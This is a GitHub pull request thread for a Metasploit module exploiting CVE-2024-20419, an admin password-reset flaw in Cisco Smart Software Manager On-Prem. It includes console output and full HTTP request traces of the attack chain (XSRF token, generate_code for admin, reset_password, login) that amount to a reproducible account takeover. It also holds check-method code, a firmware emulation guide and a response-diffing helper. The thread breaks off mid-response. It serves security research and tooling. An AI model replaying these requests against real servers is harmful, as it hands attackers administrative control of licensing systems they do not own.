
Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module #19375

Merged
merged 8 commits into from
Sep 24, 2024

Conversation

h4x-x0r
Contributor

@h4x-x0r h4x-x0r commented Aug 9, 2024

This is a new module which exploits an account takeover vulnerability in Cisco Smart Software Manager (SSM) On-Prem <= 8-202206 (CVE-2024-20419), by changing the password of the admin user to an attacker-controlled one.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's installation guide.
  3. Start msfconsole
  4. use auxiliary/admin/http/cisco_ssm_onprem_account
  5. set RHOSTS <IP>
  6. set SSL true
  7. run

A new password (currently hardcoded to Testbaaasab@123456780) should have been set for the admin account.

msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set SSL true
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.137.200

[*] Starting workflow...
[+] Server reachable.
[*] xsrf_token: B%2BxNjt72KTh%2BW%2FYhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R%2BvtX%2FLK%2B1A%3D%3D
[*] xsrf_token: B+xNjt72KTh+W/YhUkSFpTKE5uM1NUkZdBMkle5C1DDpr9P9lPyPDN556BImuPHfSsdy4W4blO8R+vtX/LK+1A==
[*] _lic_engine_session: f517481befa8b1a7cddcb1d755b8163c
[+] Server reachable.
[*] auth_token: 21bf4695d594af3bd5f0f07db2ce8f09f29abe6f9295e2649e3fa5f266ada2a1
[+] Server reachable.
[*] Auxiliary module execution completed

Successfully tested on

  • Cisco Smart Software Manager v8-202206

@h4x-x0r h4x-x0r changed the title Cisco SSM On-Prem Account Takeover (CVE-2024-20419) Module Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module Aug 9, 2024
@h4x-x0r h4x-x0r marked this pull request as draft August 9, 2024 18:21
Code cleanup and error handling added
@h4x-x0r h4x-x0r marked this pull request as ready for review August 9, 2024 20:11
@h4x-x0r
Contributor Author

h4x-x0r commented Aug 9, 2024

Added error handling and made the code cleaner:

msf6 > use auxiliary/admin/http/cisco_ssm_onprem_account 
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set RHOSTS 192.168.137.200
RHOSTS => 192.168.137.200
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > exploit 
[*] Running module against 192.168.137.200

[+] Server reachable.
[+] Retrieved XSRF Token: ZC4gteysvPfdyE1ptGLxAf8L5P/YRinaBpr8vrMjVvGNIbHFyfmEGeoMRjmYDS2pxMU1dopq/PDG4A33H5n84Q==
[+] Retrieved _lic_engine_session: a585c40891118ca34bfc0d9203bb5d7e
[+] Retrieved auth_token: 5ac1a8f9d8572bb2f9804fa90c6f9a52589ec6905cf863ea76af22d482228b23
[+] Password for the admin user was successfully updated: F7bTlBUiD62LaHmD!
[+] Login at: http://192.168.137.200:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

Added store_valid_credential
Code cleanup
Contributor

@dwelch-r7 dwelch-r7 left a comment


Thanks for the PR, is it possible to add in a check method?

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 15, 2024

Thanks for the PR, is it possible to add in a check method?

Thank you for reviewing the PR!

If I remember correctly, I didn't see an endpoint that returned version information for fingerprinting. Did you see one that I could add?

@h4x-x0r h4x-x0r marked this pull request as draft August 19, 2024 13:27
code cleanup
@h4x-x0r h4x-x0r marked this pull request as ready for review August 19, 2024 15:50
@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 23, 2024
@bwatters-r7
Contributor

This is an initial draft of a working PoC
@h4x-x0r is this ready, now?

@jheysel-r7 jheysel-r7 self-assigned this Aug 27, 2024
@h4x-x0r
Contributor Author

h4x-x0r commented Aug 27, 2024

This is an initial draft of a working PoC
@h4x-x0r is this ready, now?

Yes, I forgot to update the description from the original post. I've removed that part - the module should be good to go. :)

Contributor

@jheysel-r7 jheysel-r7 left a comment


Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.

Would you be able to send the vulnerable .iso to msfdev@metasploit.com? That would be greatly appreciated!

Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 27, 2024

Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.

Would you be able to send the vulnerable .iso to msfdev@metasploit.com? That would be greatly appreciated!

Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!

That's unfortunate; getting the affected software from a vendor always seems to be the biggest issue.
It is too big to send by email (around 3GB if I remember correctly), but I'll reach out shortly.

Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context?

On a related note - I have a couple of modules that exploit vulnerabilities in hardware devices (routers, switches, embedded servers, printers, etc.). I either had access to the hardware, or in some cases I did user-mode emulation or full system emulation to get the targets running, but the process is usually quite involved or may rely on custom code that I created to get it working (i.e., you might not have access to the vulnerable product to run the module against). In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR?

@jheysel-r7
Contributor

It is too big to send by email (around 3GB if I remember correctly), but I'll reach out shortly.

Would you maybe be able to upload it to Google Drive and then email the link?

Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context?

Yea! That's exactly what I was going to experiment with. Look for the differences in response codes/response bodies between the patched and unpatched versions.

Here's an example of a check method checking for the presence of the patch via HTTP response codes and header values instead of version info:

def check
  res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),
    'vars_post' => {
      'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))
    }
  )
  if res.nil?
    CheckCode::Unknown("The target server didn't respond!")
  elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')
    CheckCode::Appears
  else
    CheckCode::Safe
  end
end

Here's another example that's not HTTP related.

def check
  erlang_ports = get_erlang_ports
  # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.
  return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?

  erlang_ports.each do |erlang_port|
    # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been
    # successful and the target as well as the specific socket used in this instance is vulnerable
    sock = connect_to_erlang_server(erlang_port.to_i)
    if sock.instance_of?(Socket)
      @vulnerable_socket = sock
      return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')
    else
      next
    end
  end
  Exploit::CheckCode::Safe('This endpoint has exposed erlang port(s) but appears to be patched')
end

In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR?

In those cases we always prefer that you either send the software for us to test or, in the case of qemu user emulation, write out the steps you took to set up the target. Like what was done here:

### Setup
Vulnerable firmware can be downloaded from:
[TS-X64_20230926-5.1.2.2533.zip](https://download.qnap.com/Storage/TS-X64/TS-X64_20230926-5.1.2.2533.zip)
In order to decrypt the firmware use the following script:
[qnap-qts-fw-cryptor.py](https://gist.github.com/ulidtko/966277a465f1856109b2d2674dcee741)
Unzip the archive:
```
user@dev:~/qnap/$ unzip TS-X64_20230926-5.1.2.2533.zip
Archive: TS-X64_20230926-5.1.2.2533.zip
inflating: TS-X64_20230926-5.1.2.2533.img
```
Decrypt the firmware:
```
user@dev:~/qnap/$ python3 qnap-qts-fw-cryptor.py d QNAPNASVERSION5 TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz
Signature check OK, model TS-X64, version 5.1.2
Encrypted 1048576 of all 220239236 bytes
[99% left]
[99% left]
[99% left]
...snip
[02% left]
[00% left]
[00% left]
user@dev:~/qnap/$ ls
qnap-qts-fw-cryptor.py TS-X64_20230926-5.1.2.2533.img TS-X64_20230926-5.1.2.2533.tgz TS-X64_20230926-5.1.2.2533.zip
```
Recreate the root file system:
```
user@dev:~/qnap/$ mkdir firmware
user@dev:~/qnap/$ tar -xvzf TS-X64_20230926-5.1.2.2533.tgz -C ./firmware/
user@dev:~/qnap/$ binwalk -e firmware/initrd.boot
user@dev:~/qnap/$ binwalk -e firmware/_initrd.boot.extracted/0
user@dev:~/qnap/$ binwalk -e firmware/rootfs2.bz
user@dev:~/qnap/$ binwalk -e firmware/_rootfs2.bz.extracted/0
user@dev:~/qnap/$ mv firmware/_rootfs2.bz.extracted/_0.extracted/* firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
```
To run the Firmware first copy the qemu-x86_64-static binary into the root file system folder:
```
user@dev:~/qnap/$ cd firmware/_initrd.boot.extracted/_0.extracted/cpio-root/
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ cp $(which qemu-x86_64-static) .
```
Run _thttpd_ via QEMU:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$
sudo chroot . ./qemu-x86_64-static usr/local/sbin/_thttpd_ -p 8080 -nor -nos -u admin -d /home/httpd -c '**.*' -h 0.0.0.0 -i /var/lock/._thttpd_.pid
```
Verify the HTTP server is running:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo netstat -lnp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1195417/./qemu-x86_
```
At the time of writing `/dev/random` and `/dev/urandom` are required to be present in the environment in order to work
around the following issue: https://github.com/rapid7/mettle/issues/255.
Ensure the binaries exist on your system:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/random
/dev/random
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ ls /dev/urandom
/dev/urandom
```
Create the files:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/random
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ touch dev/urandom
```
Mount the binaries:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/random dev/random
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo mount --bind /dev/urandom dev/urandom
```
Drop to a shell via QEMU:
```
user@dev:~/qnap/firmware/_initrd.boot.extracted/_0.extracted/cpio-root$ sudo chroot . /bin/sh
```
Enable the component quick.cgi:
```
sh-3.2# chmod +x /home/httpd/cgi-bin/quick/quick.cgi
```
Fix a linker issue with QEMU:
```
sh-3.2# rm /lib/libnl-3.so.200
sh-3.2# ln -s /lib/libnl-3.so.200.24.0 /lib/libnl-3.so.200
```
Create this folder as it will be present in a NAS device containing a hard drive:
```
sh-3.2# mkdir /mnt/HDA_ROOT
```

That way other users can test the module, and if any future work needs to be done on the module we have a guide on how to set up a test target.

If you write a module for a physical device and there's no way for us to verify the module works/set up a test target on our end, we can accept a .pcap file of the exploit working. Although if possible we do prefer to have the documentation file list the steps necessary to set up a test target.
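The fingerprinting approach discussed above (looking for differences between patched and unpatched responses rather than a version string) is easier to reason about with a tool that strips the noise first. The following is an added example, not code from this PR or from Metasploit: it parses two raw HTTP responses, sets aside volatile headers (Date, ETag, X-Request-Id, X-Runtime, X_CSL_TIMESTAMP) and cookie values, and reports which headers were added, removed or changed and which cookie attribute flags each cookie gained or lost. The two sample responses are constructed from the headers shown in the vulnerable and patched captures later in this review, with token, session and hostname values replaced by placeholders. Header-level differences like these depend on the build and on whatever sits in front of the application, so treat them as a hint to confirm against behaviour, not as proof of patch state on their own.

```ruby
require 'set'

# Headers whose values change on every response and carry no patch signal.
VOLATILE_HEADERS = %w[date etag x-request-id x-runtime x_csl_timestamp].freeze

# Parse a raw HTTP/1.x response into [status_code, headers, body].
# Header names are downcased; a repeated header keeps every value in an array.
def parse_http_response(raw)
  head, body = raw.split(/\r?\n\r?\n/, 2)
  lines = head.to_s.lines.map(&:chomp)
  code = lines.shift.to_s[%r{\AHTTP/\d\.\d (\d{3})}, 1].to_i
  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next if name.nil? || value.nil?

    (headers[name.strip.downcase] ||= []) << value.strip
  end
  [code, headers, body.to_s]
end

# Turn Set-Cookie values (several cookies may be joined with ", " as in the
# captures in this review) into { cookie_name => Set of lowercase attribute names }.
def cookie_flags(set_cookie_values)
  flags = {}
  set_cookie_values.each do |value|
    value.split(/,\s*(?=[^;=,\s]+=)/).each do |cookie|
      parts = cookie.split(';').map(&:strip)
      name = parts.shift.to_s.split('=', 2).first
      flags[name] = parts.map { |attr| attr.split('=', 2).first.downcase }.to_set
    end
  end
  flags
end

# Report how response B differs from response A once volatile headers and
# cookie values are set aside: status, body, added/removed/changed headers
# and per-cookie attribute flags (secure, httponly, ...).
def diff_responses(raw_a, raw_b, ignore: VOLATILE_HEADERS)
  code_a, h_a, body_a = parse_http_response(raw_a)
  code_b, h_b, body_b = parse_http_response(raw_b)
  keys_a = h_a.keys - ignore - ['set-cookie']
  keys_b = h_b.keys - ignore - ['set-cookie']
  changed = {}
  (keys_a & keys_b).each do |k|
    changed[k] = [h_a[k].join(', '), h_b[k].join(', ')] if h_a[k] != h_b[k]
  end
  flags_a = cookie_flags(h_a.fetch('set-cookie', []))
  flags_b = cookie_flags(h_b.fetch('set-cookie', []))
  cookie_diff = {}
  (flags_a.keys | flags_b.keys).each do |name|
    a = flags_a.fetch(name, Set.new)
    b = flags_b.fetch(name, Set.new)
    cookie_diff[name] = { gained: (b - a).to_a.sort, lost: (a - b).to_a.sort } if a != b
  end
  {
    status: code_a == code_b ? nil : [code_a, code_b],
    body_changed: body_a.strip != body_b.strip,
    added: (keys_b - keys_a).sort,
    removed: (keys_a - keys_b).sort,
    changed: changed,
    cookie_flags: cookie_diff
  }
end

# Constructed samples: trimmed from the vulnerable and patched captures in this
# review, with token/session values and the random hostname replaced by
# placeholders so that only the patch-related differences remain.
VULNERABLE_RESPONSE = <<~HTTP
  HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 29 Aug 2024 21:33:34 GMT
  Content-Type: application/json; charset=utf-8
  X-Frame-Options: SAMEORIGIN, DENY
  ETag: W/"9082ef92676a7e2e1348fd860dd9af23"
  Cache-Control: max-age=0, private, must-revalidate
  Set-Cookie: XSRF-TOKEN=TOKEN_A; path=/, _lic_engine_session=SESSION_A; path=/; HttpOnly
  X-Request-Id: 7d18818c-4899-4b5d-aedb-f87918ed62aa
  Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

  {"enabled":false,"redirect":"https://HOSTNAME:8443/backend/auth/adfs"}
HTTP

PATCHED_RESPONSE = <<~HTTP
  HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 29 Aug 2024 21:33:54 GMT
  Content-Type: application/json; charset=utf-8
  X-Frame-Options: SAMEORIGIN, DENY
  Cache-Control: no-cache, no-store
  Pragma: no-cache
  Expires: 0
  ETag: W/"d38b0eae8cae5236d54cfce21dfdfc13"
  Set-Cookie: XSRF-TOKEN=TOKEN_B; path=/; secure, _lic_engine_session=SESSION_B; path=/; secure; HttpOnly
  X-Request-Id: 23786a7e-db94-43ab-a8e0-5e2bd3f1fad6
  Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

  {"enabled":false,"redirect":"https://HOSTNAME:8443/backend/auth/adfs"}
HTTP

pp diff_responses(VULNERABLE_RESPONSE, PATCHED_RESPONSE) if $PROGRAM_NAME == __FILE__
```

On these two samples the report shows the Cache-Control value changing, Pragma and Expires appearing, and both cookies gaining the secure flag, while the body is unchanged; the same function run on two captures of the same build returns an empty diff, which is the baseline to establish before trusting any header as a fingerprint.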

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 29, 2024

@jheysel-r7 I've sent two emails (the day before yesterday and yesterday), just wanted to check if you got them.

@h4x-x0r
Contributor Author

h4x-x0r commented Aug 29, 2024

No problem, I've forwarded them to you directly.

Contributor

@jheysel-r7 jheysel-r7 left a comment


Hey @h4x-x0r, thanks for the great module. A couple of minor comments. Testing was as expected 👍

Check Method

I'd first suggest refactoring the four requests that are sent in the run method into their own methods because you'll need most of that functionality in the check method.

We want to avoid sending all 4 requests twice, so we can create instance variables in the check method like so:

@xsrf_token_value = get_xsrf_token_value

But because users have the ability to disable the check method, it's not guaranteed they'll get set in the check method, so we can use a conditional assignment operator in the run method to set the instance variables if they're nil.

@xsrf_token_value ||= get_xsrf_token_value

A good example of this pattern can be found here:

@version_request_response ||= send_version_request
@parsed_data ||= parse_rocketmq_data(@version_request_response)
@broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])
print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")
execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })

I've included output from a vulnerable and non-vulnerable target. It looks like if the check method gets the xsrf_token and the auth_token it should be able to send a request to /backend/reset_password, and a patched target will respond with:
{"error":"Invalid Access","error_message":"Invalid Access"} whereas a vulnerable target will respond with: {"status":"OK"}.

It's a bit of an invasive check method as it's exploiting the vuln and resetting the password; there might be a better way.

Vulnerable Cisco SSM 8

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40

####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=luLnhy HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0


####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214846
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"9082ef92676a7e2e1348fd860dd9af23"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; path=/, _lic_engine_session=41457e8c3072e315668f818961607fd5; path=/; HttpOnly
X-Request-Id: 7d18818c-4899-4b5d-aedb-f87918ed62aa
X-Runtime: 0.009177
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"enabled":false,"redirect":"https://luLnhy:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 15

{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214884
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"290c8043abcda9226d13c9088b82c312"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; path=/
X-Request-Id: 89365b5d-d64d-4f74-bbdc-fd42d3f32e86
X-Runtime: 0.022502
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95"}
[+] Retrieved auth_token: 5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 189

{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215118
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"3d23d39a30bb7323f8ccfd64c52cf286"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; path=/
X-Request-Id: 9123f82b-762a-4a86-a3df-5cc14a1af28c
X-Runtime: 0.223049
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"status":"OK"}
####################
# Request:
####################
POST /backend/auth/identity/callback HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Accept: application/json
Content-Type: application/json
Content-Length: 52

{"username":"admin","password":"!1jUbfF9a2dxknM0P!"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215564
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"053537117e54842d118b2d083c3ca797"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=la%2Fc1B2m7jH%2Fb1SLfYR%2FJ1SIT9on4duQ4pcN8P4B70Do49Rfag6Up5Bn%2BbbVn%2FrUyADJZOs%2Fi6a0YsPbJys1KQ%3D%3D; path=/
X-Request-Id: 32f7e171-fd70-42d1-8949-6f41c0daf9dc
X-Runtime: 0.431364
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"provider":"identity","email":"","uid":"admin","first_name":"Local","last_name":"Admin","display_name":"Local Admin","organization":null,"country":"UNITED_STATES","language":"ENGLISH","description":null,"account_status":1,"role":"admin","individual_system_role":"admin","admin":"admin","id":1,"session_key":"68ac590bb05690cbb2ebacc9fcb1c15d5b19bb62ac39e8d33e3240ca25eb54bd","sso_user_id":null,"password_expires_in":null}
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed

Patched Cisco SSM 9

msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set rhost 172.16.199.201
rhost => 172.16.199.201
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.201

####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=mznLWl HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0


####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967234374
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"d38b0eae8cae5236d54cfce21dfdfc13"
Set-Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; path=/; secure, _lic_engine_session=0e84f758847748e8f185cbd782272edf; path=/; secure; HttpOnly
X-Request-Id: 23786a7e-db94-43ab-a8e0-5e2bd3f1fad6
X-Runtime: 0.056111
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"enabled":false,"redirect":"https://mznLWl:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 15

{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
